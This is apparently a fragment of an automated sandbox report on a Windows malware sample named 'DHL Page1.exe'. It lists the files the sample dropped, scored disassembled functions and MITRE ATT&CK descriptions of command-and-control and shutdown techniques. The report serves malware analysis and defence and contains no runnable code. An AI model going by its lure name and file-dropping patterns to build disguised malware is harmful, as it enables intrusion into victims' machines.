Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\Flashs134.Bli

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\Prelectured.sma

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\Sber.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\foregahger.luf

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\merskumspibers.gha

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\standardiseringers.ulo

C:\Users\user\AppData\Local\Temp\nsm38B1.tmp

C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dll

C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll

C:\Users\user\Pictures\Milliluxes.lnk

C:\Users\Public\Pictures\Milliluxes.lnk

C:\Windows\SysWOW64\Dogmefastes.lnk

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
DHL Page1.exe

Function 0040346C Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Function 004054D2 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00406256 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405A25 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148
filestringCOMMON

Function 00403E20 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 00403A7D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402ED5 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 209
memoryCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405393 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004032A5 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
COMMON

Function 00405862 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 0040659E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004023EA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registrystringCOMMON

Function 00405E38 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre